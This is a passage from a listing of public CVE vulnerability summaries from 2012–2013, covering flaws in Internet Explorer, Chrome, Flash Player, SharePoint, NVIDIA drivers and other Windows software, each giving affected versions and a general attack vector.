Vulnerability." [CVE-2013-1290] Microsoft SharePoint Server 2013, in certain configurations involving legacy My Sites, does not properly establish default access controls for a SharePoint list, which allows remote authenticated users to bypass intended restrictions on reading list items via a direct request for a list's location, aka "Incorrect Access Rights Information Disclosure Vulnerability." [CVE-2013-1289] Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Server 2010 SP1, Groove Server 2010 SP1, SharePoint Foundation 2010 SP1, and Office Web Apps 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via a crafted string, aka "HTML Sanitization Vulnerability." [CVE-2013-1288] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CTreeNode Use After Free Vulnerability." [CVE-2013-1282] The LDAP service in Microsoft Active Directory, Active Directory Application Mode (ADAM), Active Directory Lightweight Directory Service (AD LDS), and Active Directory Services allows remote attackers to cause a denial of service (memory consumption and service outage) via a crafted query, aka "Memory Consumption Vulnerability." [CVE-2013-1192] The JAR files on Cisco Device Manager for Cisco MDS 9000 devices before 5.2.8, and Cisco Device Manager for Cisco Nexus 5000 devices, allow remote attackers to execute arbitrary commands on Windows client machines via a crafted element-manager.jnlp file, aka Bug IDs CSCty17417 and CSCty10802. [CVE-2013-1092] Multiple unquoted Windows search path vulnerabilities in Novell ZENworks Desktop Management (ZDM) 7 through 7.1 might allow local users to gain privileges via a Trojan horse "program" file in the C: folder, related to an attempted launch of (1) ZenRem32.exe or (2) wm.exe. [CVE-2013-1087] Cross-site scripting (XSS) vulnerability in the client in Novell GroupWise through 8.0.3 HP3, and 2012 through SP2, on Windows allows user-assisted remote attackers to inject arbitrary web script or HTML via the body of an e-mail message. [CVE-2013-0931] EMC RSA Authentication Agent 7.1.x before 7.1.2 on Windows does not enforce the Quick PIN Unlock timeout feature, which allows physically proximate attackers to bypass the passcode requirement for a screensaved session by entering a PIN after timeout expiration. [CVE-2013-0900] Race condition in the International Components for Unicode (ICU) functionality in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. [CVE-2013-0899] Integer overflow in the padding implementation in the opus_packet_parse_impl function in src/opus_decoder.c in Opus before 1.0.2, as used in Google Chrome before 25.0.1364.97 on Windows and Linux and before 25.0.1364.99 on Mac OS X and other products, allows remote attackers to cause a denial of service (out-of-bounds read) via a long packet. [CVE-2013-0898] Use-after-free vulnerability in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors involving a URL. [CVE-2013-0897] Off-by-one error in the PDF functionality in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service via a crafted document. [CVE-2013-0896] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly manage memory during message handling for plug-ins, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. [CVE-2013-0894] Buffer overflow in the vorbis_parse_setup_hdr_floors function in the Vorbis decoder in vorbisdec.c in libavcodec in FFmpeg through 1.1.3, as used in Google Chrome before 25.0.1364.97 on Windows and Linux and before 25.0.1364.99 on Mac OS X and other products, allows remote attackers to cause a denial of service (divide-by-zero error or out-of-bounds array access) or possibly have unspecified other impact via vectors involving a zero value for a bark map size. [CVE-2013-0893] Race condition in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to media. [CVE-2013-0892] Multiple unspecified vulnerabilities in the IPC layer in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allow remote attackers to cause a denial of service or possibly have other impact via unknown vectors. [CVE-2013-0891] Integer overflow in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a blob. [CVE-2013-0890] Multiple unspecified vulnerabilities in the IPC layer in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allow remote attackers to cause a denial of service (memory corruption) or possibly have other impact via unknown vectors. [CVE-2013-0889] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly enforce a user gesture requirement before proceeding with a file download, which might make it easier for remote attackers to execute arbitrary code via a crafted file. [CVE-2013-0888] Skia, as used in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service (out-of-bounds read) via vectors related to a "user gesture check for dangerous file downloads." [CVE-2013-0887] The developer-tools process in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly restrict privileges during interaction with a connected server, which has unspecified impact and attack vectors. [CVE-2013-0885] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly restrict API privileges during interaction with the Chrome Web Store, which has unspecified impact and attack vectors. [CVE-2013-0884] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly load Native Client (aka NaCl) code, which has unspecified impact and attack vectors. [CVE-2013-0883] Skia, as used in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service (incorrect read operation) via unspecified vectors. [CVE-2013-0882] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service (incorrect memory access) or possibly have unspecified other impact via a large number of SVG parameters. [CVE-2013-0881] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service (incorrect read operation) via crafted data in the Matroska container format. [CVE-2013-0880] Use-after-free vulnerability in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to databases. [CVE-2013-0879] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly implement web audio nodes, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors. [CVE-2013-0840] Google Chrome before 24.0.1312.56 does not validate URLs during the opening of new windows, which has unspecified impact and remote attack vectors. [CVE-2013-0830] The IPC layer in Google Chrome before 24.0.1312.52 on Windows omits a NUL character required for termination of an unspecified data structure, which has unknown impact and attack vectors. [CVE-2013-0811] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1307. [CVE-2013-0799] Buffer overflow in the Mozilla Maintenance Service in Mozilla Firefox before 20.0, Firefox ESR 17.x before 17.0.5, Thunderbird before 17.0.5, and Thunderbird ESR 17.x before 17.0.5 on Windows allows local users to gain privileges via crafted arguments. [CVE-2013-0683] The DataSim and DataPid demonstration clients in Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 allow remote servers to cause a denial of service (incorrect pointer access and client crash) via malformed data in a formatted text command. [CVE-2013-0682] Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 do not properly handle exceptions, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via malformed data in a formatted text command, leading to out-of-bounds access to (1) heap or (2) stack memory. [CVE-2013-0681] Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 allow remote attackers to cause a denial of service (NULL pointer dereference and application crash) via malformed data in a formatted text command. [CVE-2013-0680] Stack-based buffer overflow in the web server in Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a long HTTP header. [CVE-2013-0650] Use-after-free vulnerability in Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on Windows and Mac OS X, before 10.3.183.68 and 11.x before 11.2.202.275 on Linux, before 11.1.111.44 on Android 2.x and 3.x, and before 11.1.115.48 on Android 4.x [CVE-2013-0649] Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0648] Unspecified vulnerability in the ExternalInterface ActionScript functionality in Adobe Flash Player before 10.3.183.67 and 11.x before 11.6.602.171 on Windows and Mac OS X, and before 10.3.183.67 and 11.x before 11.2.202.273 on Linux, allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013. [CVE-2013-0647] Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0646] Integer overflow in Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on Windows and Mac OS X, before 10.3.183.68 and 11.x before 11.2.202.275 on Linux, before 11.1.111.44 on Android 2.x and 3.x, and before 11.1.115.48 on Android 4.x [CVE-2013-0645] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0644] Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0643] The Firefox sandbox in Adobe Flash Player before 10.3.183.67 and 11.x before 11.6.602.171 on Windows and Mac OS X, and before 10.3.183.67 and 11.x before 11.2.202.273 on Linux, does not properly restrict privileges, which makes it easier for remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013. [CVE-2013-0642] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0639] Integer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0638] Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0637] Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-0634] Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted SWF content, as exploited in the wild in February 2013. [CVE-2013-0633] Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013. [CVE-2013-0630] Buffer overflow in Adobe Flash Player before 10.3.183.50 and 11.x before 11.5.502.146 on Windows and Mac OS X, before 10.3.183.50 and 11.x before 11.2.202.261 on Linux, before 11.1.111.31 on Android 2.x and 3.x, and before 11.1.115.36 on Android 4.x [CVE-2013-0572] Cross-site scripting (XSS) vulnerability in IBM Document Connect for Application Support Facility (aka DC4ASF) before 1.0.0.1218 in Application Support Facility (ASF) 3.4 for z/OS on Windows, Linux, and AIX allows remote authenticated users to inject content, and conduct phishing attacks, via unspecified vectors. [CVE-2013-0571] Cross-site scripting (XSS) vulnerability in IBM Document Connect for Application Support Facility (aka DC4ASF) before 1.0.0.1218 in Application Support Facility (ASF) 3.4 for z/OS on Windows, Linux, and AIX allows remote attackers to inject arbitrary web script or HTML via a crafted URL. [CVE-2013-0541] Buffer overflow in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.29, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2 on Windows, when a localOS registry is used in conjunction with WebSphere Identity Manger (WIM), allows local users to cause a denial of service (daemon crash) via unspecified vectors. [CVE-2013-0504] Buffer overflow in the broker service in Adobe Flash Player before 10.3.183.67 and 11.x before 11.6.602.171 on Windows and Mac OS X, and before 10.3.183.67 and 11.x before 11.2.202.273 on Linux, allows attackers to execute arbitrary code via unspecified vectors. [CVE-2013-0240] Gnome Online Accounts (GOA) 3.4.x, 3.6.x before 3.6.3, and 3.7.x before 3.7.5, does not properly validate SSL certificates when creating accounts such as Windows Live and Facebook accounts, which allows man-in-the-middle attackers to obtain sensitive information such as credentials by sniffing the network. [CVE-2013-0111] daemonu.exe (aka the NVIDIA Update Service Daemon), as distributed with the NVIDIA driver before 307.78, and Release 310 before 311.00, on Windows, lacks " (double quote) characters in the service path, which allows local users to gain privileges via a Trojan horse program. [CVE-2013-0110] nvSCPAPISvr.exe in the NVIDIA Stereoscopic 3D Driver service, as distributed with the NVIDIA driver before 307.78, and Release 310 before 311.00, on Windows, lacks " (double quote) characters in the service path, which allows local users to gain privileges via a Trojan horse program. [CVE-2013-0109] The NVIDIA driver before 307.78, and Release 310 before 311.00, in the NVIDIA Display Driver service on Windows does not properly handle exceptions, which allows local users to gain privileges or cause a denial of service (memory overwrite) via a crafted application. [CVE-2013-0095] Outlook in Microsoft Office for Mac 2008 before 12.3.6 and Office for Mac 2011 before 14.3.2 allows remote attackers to trigger access to a remote URL and consequently confirm the rendering of an HTML e-mail message by including unspecified HTML5 elements and leveraging the installation of a WebKit browser on the victim's machine, aka "Unintended Content Loading Vulnerability." [CVE-2013-0094] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer removeChild Use After Free Vulnerability." [CVE-2013-0093] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer onBeforeCopy Use After Free Vulnerability." [CVE-2013-0092] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer GetMarkupPtr Use After Free Vulnerability." [CVE-2013-0091] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CElement Use After Free Vulnerability." [CVE-2013-0090] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CCaret Use After Free Vulnerability." [CVE-2013-0089] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CMarkupBehaviorContext Use After Free Vulnerability." [CVE-2013-0088] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer saveHistory Use After Free Vulnerability." [CVE-2013-0087] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer OnResize Use After Free Vulnerability." [CVE-2013-0086] Microsoft OneNote 2010 SP1 does not properly determine buffer sizes during memory allocation, which allows remote attackers to obtain sensitive information via a crafted OneNote file, aka "Buffer Size Validation Vulnerability." [CVE-2013-0085] Buffer overflow in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to cause a denial of service (W3WP process crash and site outage) via a crafted URL, aka "Buffer Overflow Vulnerability." [CVE-2013-0084] Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability." [CVE-2013-0083] Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Server 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via crafted content, leading to administrative command execution, aka "SharePoint XSS Vulnerability." [CVE-2013-0080] Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allow remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "Callback Function Vulnerability." [CVE-2013-0079] Microsoft Visio Viewer 2010 SP1 allows remote attackers to execute arbitrary code via a crafted Visio file that triggers incorrect memory allocation, aka "Visio Viewer Tree Object Type Confusion Vulnerability." [CVE-2013-0074] Microsoft Silverlight 5, and 5 Developer Runtime, before 5.1.20125.0 does not properly validate pointers during HTML object rendering, which allows remote attackers to execute arbitrary code via a crafted Silverlight application, aka "Silverlight Double Dereference Vulnerability." [CVE-2013-0030] The Vector Markup Language (VML) implementation in Microsoft Internet Explorer 6 through 10 does not properly allocate buffers, which allows remote attackers to execute arbitrary code via a crafted web site, aka "VML Memory Corruption Vulnerability." [CVE-2013-0029] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CHTML Use After Free Vulnerability." [CVE-2013-0028] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CObjectElement Use After Free Vulnerability." [CVE-2013-0027] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CPasteCommand Use After Free Vulnerability." [CVE-2013-0026] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer InsertElement Use After Free Vulnerability." [CVE-2013-0025] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer SLayoutRun Use After Free Vulnerability." [CVE-2013-0024] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer pasteHTML Use After Free Vulnerability." [CVE-2013-0023] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CDispNode Use After Free Vulnerability." [CVE-2013-0022] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability." [CVE-2013-0021] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer vtable Use After Free Vulnerability." [CVE-2013-0020] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CMarkup Use After Free Vulnerability." [CVE-2013-0019] Use-after-free vulnerability in Microsoft Internet Explorer 7 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer COmWindowProxy Use After Free Vulnerability." [CVE-2013-0018] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer SetCapture Use After Free Vulnerability." [CVE-2013-0015] Microsoft Internet Explorer 6 through 9 does not properly perform auto-selection of the Shift JIS encoding, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site that triggers cross-domain scrolling events, aka "Shift JIS Character Encoding Vulnerability." [CVE-2013-0010] Cross-site scripting (XSS) vulnerability in Microsoft System Center Operations Manager 2007 SP1 and R2 allows remote attackers to inject arbitrary web script or HTML via crafted input, aka "System Center Operations Manager Web Console XSS Vulnerability," a different vulnerability than CVE-2013-0009. [CVE-2013-0009] Cross-site scripting (XSS) vulnerability in Microsoft System Center Operations Manager 2007 SP1 and R2 allows remote attackers to inject arbitrary web script or HTML via crafted input, aka "System Center Operations Manager Web Console XSS Vulnerability," a different vulnerability than CVE-2013-0010. [CVE-2013-0007] Microsoft XML Core Services (aka MSXML) 4.0, 5.0, and 6.0 does not properly parse XML content, which allows remote attackers to execute arbitrary code via a crafted web page, aka "MSXML XSLT Vulnerability." [CVE-2013-0006] Microsoft XML Core Services (aka MSXML) 3.0, 5.0, and 6.0 does not properly parse XML content, which allows remote attackers to execute arbitrary code via a crafted web page, aka "MSXML Integer Truncation Vulnerability." [CVE-2013-0004] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly validate the permissions of objects in memory, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "Double Construction Vulnerability." [CVE-2013-0003] Buffer overflow in a System.DirectoryServices.Protocols (S.DS.P) namespace method in Microsoft .NET Framework 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages a missing array-size check during a memory copy operation, aka "S.DS.P Buffer Overflow Vulnerability." [CVE-2012-6533] Buffer overflow in pgpwded.sys in Symantec PGP Desktop 10.x and Encryption Desktop 10.3.0 before MP1 on Windows XP and Server 2003 allows local users to gain privileges via a crafted application. [CVE-2012-6502] Microsoft Internet Explorer before 10 allows remote attackers to obtain sensitive information about the existence of files, and read certain data from files, via a UNC share pathname in the SRC attribute of a SCRIPT element, as demonstrated by reading a name-value pair from a local file via a \\127.0.0.1\C$\ sequence. [CVE-2012-5678] Adobe Flash Player before 10.3.183.48 and 11.x before 11.5.502.135 on Windows, before 10.3.183.48 and 11.x before 11.5.502.136 on Mac OS X, before 10.3.183.48 and 11.x before 11.2.202.258 on Linux, before 11.1.111.29 on Android 2.x and 3.x, and before 11.1.115.34 on Android 4.x [CVE-2012-5677] Integer overflow in Adobe Flash Player before 10.3.183.48 and 11.x before 11.5.502.135 on Windows, before 10.3.183.48 and 11.x before 11.5.502.136 on Mac OS X, before 10.3.183.48 and 11.x before 11.2.202.258 on Linux, before 11.1.111.29 on Android 2.x and 3.x, and before 11.1.115.34 on Android 4.x [CVE-2012-5676] Buffer overflow in Adobe Flash Player before 10.3.183.48 and 11.x before 11.5.502.135 on Windows, before 10.3.183.48 and 11.x before 11.5.502.136 on Mac OS X, before 10.3.183.48 and 11.x before 11.2.202.258 on Linux, before 11.1.111.29 on Android 2.x and 3.x, and before 11.1.115.34 on Android 4.x [CVE-2012-5673] Unspecified vulnerability in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5672] Microsoft Excel Viewer (aka Xlview.exe) and Excel in Microsoft Office 2007 (aka Office 12) allow remote attackers to cause a denial of service (read access violation and application crash) via a crafted spreadsheet file, as demonstrated by a .xls file with battery voltage data. [CVE-2012-5459] Untrusted search path vulnerability in VMware Workstation 8.x before 8.0.5 and VMware Player 4.x before 4.0.5 on Windows allows host OS users to gain host OS privileges via a Trojan horse DLL in a "system folder." [CVE-2012-5458] VMware Workstation 8.x before 8.0.5 and VMware Player 4.x before 4.0.5 on Windows use weak permissions for unspecified process threads, which allows host OS users to gain host OS privileges via a crafted application. [CVE-2012-5429] The VPN driver in Cisco VPN Client on Windows does not properly interact with the kernel, which allows local users to cause a denial of service (kernel fault and system crash) via a crafted application, aka Bug ID CSCuc81669. [CVE-2012-5383] DISPUTED Untrusted search path vulnerability in the installation functionality in Oracle MySQL 5.5.28, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the "C:\MySQL\MySQL Server 5.5\bin" directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the MySQL installation. [CVE-2012-5382] DISPUTED Untrusted search path vulnerability in the installation functionality in Zend Server 5.6.0 SP4, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the C:\Zend\ZendServer\share\ZendFramework\bin directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the choice of C:\ (and the resulting unsafe PATH) is established by an administrative action that is not a default part of the Zend Server installation. [CVE-2012-5381] DISPUTED Untrusted search path vulnerability in the installation functionality in PHP 5.3.17, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the C:\PHP directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the PHP installation. [CVE-2012-5380] DISPUTED Untrusted search path vulnerability in the installation functionality in Ruby 1.9.3-p194, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the C:\Ruby193\bin directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the Ruby installation. [CVE-2012-5379] DISPUTED Untrusted search path vulnerability in the installation functionality in ActivePython 3.2.2.3, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the C:\Python27 or C:\Python27\Scripts directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the ActivePython installation. [CVE-2012-5378] Untrusted search path vulnerability in the installation functionality in ActiveTcl 8.5.12, when installed in the top-level C:\ directory, allows local users to gain privileges via a Trojan horse DLL in the C:\TD\bin directory, which is added to the PATH system environment variable, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. [CVE-2012-5377] Untrusted search path vulnerability in the installation functionality in ActivePerl 5.16.1.1601, when installed in the top-level C:\ directory, allows local users to gain privileges via a Trojan horse DLL in the C:\Perl\Site\bin directory, which is added to the PATH system environment variable, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. [CVE-2012-5287] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5286] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5285] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 